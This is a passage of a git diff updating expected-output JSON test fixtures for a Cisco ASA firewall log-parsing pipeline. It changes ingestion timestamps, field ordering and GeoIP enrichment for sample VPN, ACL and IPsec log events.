{ - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", @@ -4533,7 +4509,7 @@ "severity": 4, "duration": 1936000000000, "reason": "User Requested", - "ingested": "2021-12-09T13:33:30.615655900Z", + "ingested": "2021-12-14T14:38:14.656581221Z", "original": "Apr 27 02:03:03 dev01: %ASA-4-113019: Group = 81.2.69.144, Username = 81.2.69.144, IP = 81.2.69.144, Session disconnected. Session Type: LAN-to-LAN, Duration: 0h:32m:16s, Bytes xmt: 297103, Bytes rcv: 1216163, Reason: User Requested", "code": "113019", "kind": "event", @@ -4554,19 +4530,6 @@ } }, { - "log": { - "level": "warning" - }, - "source": { - "user": { - "name": "john" - }, - "address": "192.168.50.3", - "ip": "192.168.50.3" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "hostname": "dev01", "product": "asa", @@ -4588,12 +4551,22 @@ "192.168.50.3" ] }, + "log": { + "level": "warning" + }, "host": { "hostname": "dev01" }, + "source": { + "user": { + "name": "john" + }, + "address": "192.168.50.3", + "ip": "192.168.50.3" + }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:30.615660Z", + "ingested": "2021-12-14T14:38:14.656581574Z", "original": "Apr 27 02:03:03 dev01: %ASA-4-722051: Group \u003cVPN5Policy\u003e User \u003cjohn\u003e IP \u003c192.168.50.3\u003e IPv4 Address \u003c192.168.50.5\u003e IPv6 address \u003c::\u003e assigned to session", "code": "722051", "kind": "event", @@ -4612,40 +4585,12 @@ }, "assigned_ip": "192.168.50.5" } - } - }, - { - "log": { - "level": "informational" - }, - "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", - "country_iso_code": "GB", - "country_name": "United Kingdom", - "region_name": "Oxfordshire", - "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" - } - }, - "address": "81.2.69.144", - "user": { - "name": "testuser" - }, - "ip": "81.2.69.144" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "dev01", "product": "asa", @@ -4667,13 +4612,35 @@ "81.2.69.144" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "dev01" }, + "source": { + "geo": { + "continent_name": "Europe", + "region_iso_code": "GB-ENG", + "city_name": "London", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "England", + "location": { + "lon": -0.0931, + "lat": 51.5142 + } + }, + "address": "81.2.69.144", + "user": { + "name": "testuser" + }, + "ip": "81.2.69.144" + }, "event": { "severity": 6, "reason": "User Requested", - "ingested": "2021-12-09T13:33:30.615664600Z", + "ingested": "2021-12-14T14:38:14.656581938Z", "original": "Apr 27 02:03:03 dev01: %ASA-6-716002: Group another-policy User testuser IP 81.2.69.144 WebVPN session terminated: User Requested.", "code": "716002", "kind": "event", @@ -4691,22 +4658,12 @@ "group_name": "another-policy" } } - } - }, - { - "log": { - "level": "informational" - }, - "source": { - "user": { - "name": "alice" - }, - "address": "192.168.50.1", - "ip": "192.168.50.1" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "dev01", "product": "asa", @@ -4728,13 +4685,23 @@ "192.168.50.1" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "dev01" }, + "source": { + "user": { + "name": "alice" + }, + "address": "192.168.50.1", + "ip": "192.168.50.1" + }, "event": { "severity": 6, "reason": "Idle timeout", - "ingested": "2021-12-09T13:33:30.615673800Z", + "ingested": "2021-12-14T14:38:14.656582310Z", "original": "Apr 27 02:03:03 dev01: %ASA-6-716002: Group another-policy User alice IP 192.168.50.1 WebVPN session terminated: Idle timeout.", "code": "716002", "kind": "event", @@ -4752,7 +4719,10 @@ "group_name": "another-policy" } } - } + }, + "tags": [ + "preserve_original_event" + ] }, { "log": { @@ -4766,20 +4736,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", @@ -4822,7 +4786,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:33:30.615895700Z", + "ingested": "2021-12-14T14:38:14.656582675Z", "original": "Apr 27 02:03:03 dev01: %ASA-3-710003: TCP access denied by ACL from 81.2.69.144/6370 to outside:192.168.157.61/23", "code": "710003", "kind": "event", @@ -4854,20 +4818,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", @@ -4914,7 +4872,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:33:30.615901200Z", + "ingested": "2021-12-14T14:38:14.656583103Z", "original": "Apr 27 2020 02:03:03 dev01: %ASA-5-434004: SFR requested ASA to bypass further packet redirection and process TCP flow from sourceInterfaceName:81.2.69.144/8888 to destinationInterfaceName:192.168.2.2/123123 locally", "code": "434004", "kind": "event", @@ -4947,20 +4905,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", @@ -5008,7 +4960,7 @@ "event": { "severity": 4, "action": "drop", - "ingested": "2021-12-09T13:33:30.615907100Z", + "ingested": "2021-12-14T14:38:14.656583461Z", "original": "Apr 27 2020 02:03:03 dev01: %ASA-4-434002: SFR requested to drop TCP packet from sourceInterfaceName:81.2.69.144/8888 to destinationInterfaceName:192.168.2.2/514514", "code": "434002", "outcome": "unknown" @@ -5032,20 +4984,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", @@ -5088,7 +5034,7 @@ "event": { "severity": 6, "reason": "Failed to locate egress interface", - "ingested": "2021-12-09T13:33:30.615911800Z", + "ingested": "2021-12-14T14:38:14.656583831Z", "original": "Apr 27 2020 02:03:03 dev01: %ASA-6-110002: Failed to locate egress interface for TCP from sourceInterfaceName:81.2.69.144/7777 to 192.168.2.2/123412", "code": "110002", "kind": "event", @@ -5120,20 +5066,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", @@ -5181,7 +5121,7 @@ "event": { "severity": 4, "reason": "Duplicate TCP SYN with different initial sequence number", - "ingested": "2021-12-09T13:33:30.615916600Z", + "ingested": "2021-12-14T14:38:14.656584183Z", "original": "Apr 27 2020 02:03:03 dev01: %ASA-4-419002: Duplicate TCP SYN from sourceInterfaceName:81.2.69.144/7777 to destinationInterfaceName:192.168.2.2/514514 with different initial sequence number", "code": "419002", "kind": "event", @@ -5211,20 +5151,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", @@ -5266,7 +5200,7 @@ "event": { "severity": 6, "action": "created", - "ingested": "2021-12-09T13:33:30.615926700Z", + "ingested": "2021-12-14T14:38:14.656584655Z", "original": "Apr 27 2020 02:03:03 dev01: %ASA-6-602303: IPSEC: An outbound LAN-to-LAN SA (SPI= 0xF81283) between 81.2.69.144 and 192.168.2.2 (user= admin) has been created.", "code": "602303", "outcome": "success" @@ -5289,20 +5223,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", @@ -5343,7 +5271,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:30.616188100Z", + "ingested": "2021-12-14T14:38:14.656585157Z", "original": "Apr 27 2020 02:03:03 dev01: %ASA-6-602304: IPSEC: An outbound LAN-to-LAN SA (SPI= 0xF81283) between 81.2.69.144 and 192.168.2.2 (user= admin) has been deleted.", "code": "602304", "kind": "event", @@ -5378,20 +5306,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", @@ -5429,7 +5351,7 @@ "event": { "severity": 5, "reason": "Received a IKE_INIT_SA request", - "ingested": "2021-12-09T13:33:30.616193300Z", + "ingested": "2021-12-14T14:38:14.656585505Z", "original": "Apr 27 2020 02:03:03 dev01: %ASA-5-750002: Local:81.2.69.144:7777 Remote:192.168.2.2:7777 Username:admin Received a IKE_INIT_SA request", "code": "750002", "kind": "event", @@ -5461,20 +5383,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", @@ -5512,7 +5428,7 @@ "event": { "severity": 4, "reason": "Negotiation aborted due to Failed to locate an item in the database", - "ingested": "2021-12-09T13:33:30.616198400Z", + "ingested": "2021-12-14T14:38:14.656585865Z", "original": "Apr 27 2020 02:03:03 dev01: %ASA-4-750003: Local:81.2.69.144:7777 Remote:192.168.2.2:7777 Username:admin Negotiation aborted due to ERROR: Failed to locate an item in the database", "code": "750003", "kind": "event", @@ -5532,16 +5448,6 @@ } }, { - "log": { - "level": "notification" - }, - "source": { - "address": "192.168.1.1", - "ip": "192.168.1.1" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "hostname": "dev01", "product": "asa", @@ -5560,13 +5466,20 @@ "192.168.1.1" ] }, + "log": { + "level": "notification" + }, "host": { "hostname": "dev01" }, + "source": { + "address": "192.168.1.1", + "ip": "192.168.1.1" + }, "event": { "severity": 5, "reason": "PHASE 2 COMPLETED", - "ingested": "2021-12-09T13:33:30.616203400Z", + "ingested": "2021-12-14T14:38:14.656586223Z", "original": "Apr 27 2020 02:03:03 dev01: %ASA-5-713120: Group = 100.60.140.10, IP = 192.168.1.1, PHASE 2 COMPLETED (msgid=bbe383e88)", "code": "713120", "kind": "event", @@ -5583,19 +5496,12 @@ }, "cisco": { "asa": {} - } - }, - { - "log": { - "level": "notification" - }, - "source": { - "address": "192.168.157.61", - "ip": "192.168.157.61" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "dev01", "product": "asa", @@ -5614,13 +5520,20 @@ "192.168.157.61" ] }, + "log": { + "level": "notification" + }, "host": { "hostname": "dev01" }, + "source": { + "address": "192.168.157.61", + "ip": "192.168.157.61" + }, "event": { "severity": 5, "reason": "Duplicate first packet detected", - "ingested": "2021-12-09T13:33:30.616208500Z", + "ingested": "2021-12-14T14:38:14.656586654Z", "original": "Apr 27 2020 02:03:03 dev01: %ASA-5-713202: IP = 192.168.157.61, Duplicate first packet detected. Ignoring packet.", "code": "713202", "kind": "event", @@ -5634,19 +5547,12 @@ }, "cisco": { "asa": {} - } - }, - { - "log": { - "level": "informational" - }, - "source": { - "address": "192.168.1.1", - "ip": "192.168.1.1" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "dev01", "product": "asa", @@ -5665,13 +5571,20 @@ "192.168.1.1" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "dev01" }, + "source": { + "address": "192.168.1.1", + "ip": "192.168.1.1" + }, "event": { "severity": 6, "reason": "All IPSec SA proposals found unacceptable!", - "ingested": "2021-12-09T13:33:30.616213100Z", + "ingested": "2021-12-14T14:38:14.656587013Z", "original": "Apr 27 2020 02:03:03 dev01: %ASA-6-713905: Group = 100.60.140.10, IP = 192.168.1.1, All IPSec SA proposals found unacceptable!", "code": "713905", "kind": "event", @@ -5687,7 +5600,10 @@ }, "cisco": { "asa": {} - } + }, + "tags": [ + "preserve_original_event" + ] }, { "observer": { @@ -5714,7 +5630,7 @@ "event": { "severity": 6, "reason": "All IPSec SA proposals found unacceptable!", - "ingested": "2021-12-09T13:33:30.616217500Z", + "ingested": "2021-12-14T14:38:14.656587373Z", "original": "Apr 27 2020 02:03:03 dev01: %ASA-6-713904: All IPSec SA proposals found unacceptable!", "code": "713904", "kind": "event", @@ -5759,7 +5675,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:30.616222200Z", + "ingested": "2021-12-14T14:38:14.656587728Z", "original": "Apr 27 2020 02:03:03 dev01: %ASA-6-713903: IP = 192.168.1.1, All IPSec SA proposals found unacceptable!", "code": "713903", "kind": "event", @@ -5803,7 +5719,7 @@ "event": { "severity": 6, "reason": "All IPSec SA proposals found unacceptable!", - "ingested": "2021-12-09T13:33:30.616226700Z", + "ingested": "2021-12-14T14:38:14.656588091Z", "original": "Apr 27 2020 02:03:03 dev01: %ASA-6-713902: Group = 100.60.140.10, All IPSec SA proposals found unacceptable!", "code": "713902", "kind": "event", @@ -5825,16 +5741,6 @@ ] }, { - "log": { - "level": "informational" - }, - "source": { - "address": "192.168.1.1", - "ip": "192.168.1.1" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "hostname": "dev01", "product": "asa", @@ -5853,13 +5759,20 @@ "192.168.1.1" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "dev01" }, + "source": { + "address": "192.168.1.1", + "ip": "192.168.1.1" + }, "event": { "severity": 6, "reason": "All IPSec SA proposals found unacceptable!", - "ingested": "2021-12-09T13:33:30.616230700Z", + "ingested": "2021-12-14T14:38:14.656588533Z", "original": "Apr 27 2020 02:03:03 dev01: %ASA-6-713901: Group = 100.60.140.10, IP = 192.168.1.1, All IPSec SA proposals found unacceptable!", "code": "713901", "kind": "event", @@ -5875,7 +5788,10 @@ }, "cisco": { "asa": {} - } + }, + "tags": [ + "preserve_original_event" + ] } ] } \ No newline at end of file diff --git a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-asa-fix.log-expected.json b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-asa-fix.log-expected.json index bf923419738..159efdad24f 100644 --- a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-asa-fix.log-expected.json +++ b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-asa-fix.log-expected.json @@ -57,7 +57,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:33:40.267545800Z", + "ingested": "2021-12-14T14:38:24.088153880Z", "original": "Apr 17 2020 14:08:08 SNL-ASA-VPN-A01 : %ASA-6-302016: Teardown UDP connection 110577675 for Outside:10.123.123.123/53723(LOCAL\\Elastic) to Inside:10.233.123.123/53 duration 0:00:00 bytes 148 (zzzzzz)", "code": "302016", "kind": "event", @@ -134,7 +134,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:40.267555200Z", + "ingested": "2021-12-14T14:38:24.088156744Z", "original": "Apr 17 2020 14:00:31 SNL-ASA-VPN-A01 : %ASA-4-106023: Deny icmp src Inside:10.123.123.123 dst Outside:10.123.123.123 (type 11, code 0) by access-group \"Inside_access_in\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -203,7 +203,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:40.267561100Z", + "ingested": "2021-12-14T14:38:24.088157221Z", "original": "Apr 15 2013 09:36:50: %ASA-4-106023: Deny tcp src dmz:10.123.123.123/6316 dst outside:10.123.123.123/53 type 3, code 0, by access-group \"acl_dmz\" [0xe3afb522, 0x0]", "code": "106023", "kind": "event", @@ -279,7 +279,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:40.267566800Z", + "ingested": "2021-12-14T14:38:24.088157636Z", "original": "Apr 17 2020 14:16:20 SNL-ASA-VPN-A01 : %ASA-4-106023: Deny udp src Inside:10.123.123.123/57621(LOCAL\\Elastic) dst Outside:10.123.123.123/57621 by access-group \"Inside_access_in\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -340,7 +340,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:33:40.267572500Z", + "ingested": "2021-12-14T14:38:24.088158021Z", "original": "Apr 17 2020 14:15:07 SNL-ASA-VPN-A01 : %ASA-2-106017: Deny IP due to Land Attack from 10.123.123.123 to 10.123.123.123", "code": "106017", "kind": "event", @@ -401,7 +401,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:33:40.267578400Z", + "ingested": "2021-12-14T14:38:24.088158406Z", "original": "Apr 17 2020 14:15:07 SNL-ASA-VPN-A01 : %ASA-3-313008: Denied IPv6-ICMP type=134, code=0 from fe80::1ff:fe23:4567:890a on interface ISP1", "code": "313008", "kind": "event", @@ -471,7 +471,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:40.267584100Z", + "ingested": "2021-12-14T14:38:24.088158903Z", "original": "Jun 08 2020 12:59:57: %ASA-4-313009: Denied invalid ICMP code 9, for Inside:10.255.0.206/8795 (10.255.0.206/8795) to identity:10.12.31.51/0 (10.12.31.51/0), ICMP id 295, ICMP type 8", "code": "313009", "kind": "event", @@ -545,7 +545,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:40.267589800Z", + "ingested": "2021-12-14T14:38:24.088159295Z", "original": "Oct 20 2019 15:42:53: %ASA-6-106100: access-list incoming permitted udp dmz2/127.2.3.4(56575) -\u003e inside/127.3.4.5(53) hit-cnt 1 first hit [0x93d0e533, 0x578ef52f]", "code": "106100", "kind": "event", @@ -615,7 +615,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:40.267609700Z", + "ingested": "2021-12-14T14:38:24.088159685Z", "original": "Oct 20 2019 15:42:54: %ASA-6-106100: access-list incoming permitted udp dmz2/127.2.3.4(56575)(LOCAL\\\\username) -\u003e inside/127.3.4.5(53) hit-cnt 1 first hit [0x93d0e533, 0x578ef52f]", "code": "106100", "kind": "event", @@ -688,7 +688,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:33:40.267615100Z", + "ingested": "2021-12-14T14:38:24.088160069Z", "original": "Aug 6 2020 11:01:37: %ASA-session-3-106102: access-list dev_inward_client permitted udp for user redacted outside/10.123.123.20(49721) -\u003e inside/10.223.223.40(53) hit-cnt 1 first hit [0x3c8b88c1, 0xbee595c3]", "code": "106102", "kind": "event", @@ -721,20 +721,14 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", @@ -783,7 +777,7 @@ }, "event": { "severity": 1, - "ingested": "2021-12-09T13:33:40.267620400Z", + "ingested": "2021-12-14T14:38:24.088160455Z", "original": "Aug 6 2020 11:01:38: %ASA-1-106103: access-list filter denied icmp for user joe inside/10.1.2.3(64321) -\u003e outside/81.2.69.144(8080) hit-cnt 1 first hit [0x3c8b88c1, 0xbee595c3]", "code": "106103", "kind": "event", diff --git a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-asa-missing-groups.log-expected.json b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-asa-missing-groups.log-expected.json index d976934cd30..6f73a88fa5c 100644 --- a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-asa-missing-groups.log-expected.json +++ b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-asa-missing-groups.log-expected.json @@ -1,26 +1,6 @@ { "expected": [ { - "log": { - "level": "warning" - }, - "destination": { - "bytes": 0, - "address": "67.43.156.12", - "ip": "67.43.156.12" - }, - "source": { - "user": { - "name": "Ringo", - "group": { - "name": "TheBeatles" - } - }, - "bytes": 32452 - }, - "tags": [ - "preserve_original_event" - ], "observer": { "type": "firewall", "product": "asa", @@ -38,11 +18,40 @@ "67.43.156.12" ] }, + "log": { + "level": "warning" + }, + "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "address": "67.43.156.12", + "bytes": 0, + "ip": "67.43.156.12" + }, + "source": { + "user": { + "name": "Ringo", + "group": { + "name": "TheBeatles" + } + }, + "bytes": 32452 + }, "event": { "severity": 4, "duration": 112000000000, "reason": "User Requested", - "ingested": "2021-12-09T13:33:41.556907800Z", + "ingested": "2021-12-14T14:38:25.437811581Z", "original": "Jun 08 2020 12:59:57: %ASA-4-113019: Group = TheBeatles, Username = Ringo, IP = 67.43.156.12, Session disconnected. Session Type: AnyConnect-Parent, Duration: 0h:01m:52s, Bytes xmt: 32452, Bytes rcv: 0, Reason: User Requested", "code": "113019", "kind": "event", @@ -60,29 +69,12 @@ "asa": { "session_type": "AnyConnect-Parent" } - } - }, - { - "log": { - "level": "warning" - }, - "destination": { - "bytes": 43252324, - "address": "67.43.156.12", - "ip": "67.43.156.12" - }, - "source": { - "user": { - "name": "John", - "group": { - "name": "TheBeatles" - } - }, - "bytes": 45323434 }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "type": "firewall", "product": "asa", @@ -100,11 +92,40 @@ "67.43.156.12" ] }, + "log": { + "level": "warning" + }, + "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "address": "67.43.156.12", + "bytes": 43252324, + "ip": "67.43.156.12" + }, + "source": { + "user": { + "name": "John", + "group": { + "name": "TheBeatles" + } + }, + "bytes": 45323434 + }, "event": { "severity": 4, "duration": 8854000000000, "reason": "Idle Timeout", - "ingested": "2021-12-09T13:33:41.556916700Z", + "ingested": "2021-12-14T14:38:25.437814109Z", "original": "Oct 20 2019 15:42:53: %ASA-4-113019: Group = TheBeatles, Username = John, IP = 67.43.156.12, Session disconnected. Session Type: SSL, Duration: 2h:27m:34s, Bytes xmt: 45323434, Bytes rcv: 43252324, Reason: Idle Timeout", "code": "113019", "kind": "event", @@ -122,7 +143,10 @@ "asa": { "session_type": "SSL" } - } + }, + "tags": [ + "preserve_original_event" + ] }, { "observer": { @@ -139,7 +163,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:41.556922600Z", + "ingested": "2021-12-14T14:38:25.437814588Z", "original": "Oct 20 2019 15:42:54: %ASA-4-722037: Group \u003cGroupPolicy_TheBeatles\u003e User \u003cPaul\u003e IP \u003c83.212.241.149\u003e SVC closing connection: DPD failure.", "code": "722037", "kind": "event", @@ -173,7 +197,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:41.556928400Z", + "ingested": "2021-12-14T14:38:25.437814959Z", "original": "Aug 6 2020 11:01:37: %ASA-4-722037: Group \u003cGroupPolicy_TheBeatles\u003e User \u003cBrian\u003e IP \u003c234.63.56.32\u003e SVC closing connection: Transport closing.", "code": "722037", "kind": "event", @@ -214,15 +238,27 @@ "level": "warning" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "address": "67.43.156.12", "user": { "name": "George" }, - "address": "67.43.156.12", "ip": "67.43.156.12" }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:41.556934300Z", + "ingested": "2021-12-14T14:38:25.437815314Z", "original": "Aug 6 2020 11:01:38: %ASA-4-722051: Group \u003cGroupPolicy_TheBeatles\u003e User \u003cGeorge\u003e IP \u003c67.43.156.12\u003e IPv4 Address \u003c67.43.156.12\u003e IPv6 address \u003c::\u003e assigned to session", "code": "722051", "kind": "event", diff --git a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-asa.log-expected.json b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-asa.log-expected.json index 749298a2f82..31fcf237859 100644 --- a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-asa.log-expected.json +++ b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-asa.log-expected.json @@ -59,7 +59,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.994733500Z", + "ingested": "2021-12-14T14:38:25.938755022Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1772 to outside:192.168.98.44/8256", "code": "305011", "kind": "event", @@ -138,7 +138,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.994738Z", + "ingested": "2021-12-14T14:38:25.938759326Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11757 for outside:192.168.205.104/80 (192.168.205.104/80) to inside:172.31.98.44/1772 (172.31.98.44/1772)", "code": "302013", "kind": "event", @@ -224,7 +224,7 @@ "severity": 6, "duration": 67000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-09T13:33:41.994741800Z", + "ingested": "2021-12-14T14:38:25.938760309Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11749 for outside:192.168.211.242/80 to inside:172.31.98.44/1758 duration 0:01:07 bytes 38110 TCP Reset-I", "code": "302014", "kind": "event", @@ -309,7 +309,7 @@ "severity": 6, "duration": 67000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-09T13:33:41.994748300Z", + "ingested": "2021-12-14T14:38:25.938761029Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11748 for outside:192.168.211.242/80 to inside:172.31.98.44/1757 duration 0:01:07 bytes 44010 TCP Reset-I", "code": "302014", "kind": "event", @@ -394,7 +394,7 @@ "severity": 6, "duration": 67000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-09T13:33:41.994753400Z", + "ingested": "2021-12-14T14:38:25.938761769Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11745 for outside:192.168.185.90/80 to inside:172.31.98.44/1755 duration 0:01:07 bytes 7652 TCP Reset-I", "code": "302014", "kind": "event", @@ -479,7 +479,7 @@ "severity": 6, "duration": 67000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-09T13:33:41.994758800Z", + "ingested": "2021-12-14T14:38:25.938762461Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11744 for outside:192.168.185.90/80 to inside:172.31.98.44/1754 duration 0:01:07 bytes 7062 TCP Reset-I", "code": "302014", "kind": "event", @@ -564,7 +564,7 @@ "severity": 6, "duration": 68000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-09T13:33:41.994765Z", + "ingested": "2021-12-14T14:38:25.938763078Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11742 for outside:192.168.160.197/80 to inside:172.31.98.44/1752 duration 0:01:08 bytes 5738 TCP Reset-I", "code": "302014", "kind": "event", @@ -649,7 +649,7 @@ "severity": 6, "duration": 